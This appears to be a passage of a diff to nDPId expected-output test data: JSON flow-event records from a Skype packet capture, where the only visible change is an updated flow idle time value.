-00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969724570,"flow_last_seen":1431969725166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3849,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969724570,"flow_last_seen":1431969725166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3849,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969714398,"flow_last_seen":1431969727593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969714398,"flow_last_seen":1431969727593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969794907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969794907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969712931,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969712931,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969724570,"flow_last_seen":1431969725166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3849,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969724570,"flow_last_seen":1431969725166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3849,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969714398,"flow_last_seen":1431969727593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969714398,"flow_last_seen":1431969727593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969794907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969794907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969712931,"flow_last_seen":1431969713736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969712931,"flow_last_seen":1431969713736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643972,"flow_last_seen":1431969670410,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 